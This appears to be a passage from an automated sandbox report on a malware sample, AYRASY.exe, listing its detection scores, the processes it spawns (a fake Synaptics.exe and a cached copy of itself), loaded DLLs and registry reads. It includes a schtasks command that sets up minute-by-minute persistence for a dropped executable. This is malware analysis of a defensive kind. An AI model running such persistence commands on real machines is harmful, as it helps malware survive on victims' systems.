                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_AYRASY.exe'
                                Source: C:\Users\user\Desktop\AYRASY.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: AYRASY.exeReversingLabs: Detection: 92%
                                Source: AYRASY.exeVirustotal: Detection: 87%
                                Source: C:\Users\user\Desktop\AYRASY.exeFile read: C:\Users\user\Desktop\AYRASY.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\AYRASY.exe "C:\Users\user\Desktop\AYRASY.exe"
                                Source: C:\Users\user\Desktop\AYRASY.exeProcess created: C:\Users\user\Desktop\._cache_AYRASY.exe "C:\Users\user\Desktop\._cache_AYRASY.exe"
                                Source: C:\Users\user\Desktop\AYRASY.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn WBHUSK.exe /tr C:\Users\user\AppData\Roaming\Windata\YOABSG.exe /sc minute /mo 1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn WBHUSK.exe /tr C:\Users\user\AppData\Roaming\Windata\YOABSG.exe /sc minute /mo 1
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe C:\Users\user\AppData\Roaming\Windata\YOABSG.exe
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe "C:\Users\user\AppData\Roaming\Windata\YOABSG.exe"
                                Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 3548
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe "C:\Users\user\AppData\Roaming\Windata\YOABSG.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe "C:\Users\user\AppData\Roaming\Windata\YOABSG.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe C:\Users\user\AppData\Roaming\Windata\YOABSG.exe
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe C:\Users\user\AppData\Roaming\Windata\YOABSG.exe
                                Source: C:\Users\user\Desktop\AYRASY.exeProcess created: C:\Users\user\Desktop\._cache_AYRASY.exe "C:\Users\user\Desktop\._cache_AYRASY.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn WBHUSK.exe /tr C:\Users\user\AppData\Roaming\Windata\YOABSG.exe /sc minute /mo 1Jump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbsJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn WBHUSK.exe /tr C:\Users\user\AppData\Roaming\Windata\YOABSG.exe /sc minute /mo 1Jump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: twext.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: twinapi.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: shacct.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: idstore.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: samlib.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: starttiledata.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: acppage.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: aepic.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: wlidprov.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: provsvc.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: twext.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: starttiledata.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: acppage.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: aepic.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: linkinfo.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: propsys.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: propsys.dll
                                Source: C:\Users\user\Desktop\AYRASY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                                Source: WBHUSK.lnk.2.drLNK file: ..\..\..\..\..\Windata\YOABSG.exe
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\qfn7FBS.iniJump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                                Source: AYRASY.exeStatic file information: File size 1750016 > 1048576
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                                Source: AYRASY.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x100c00
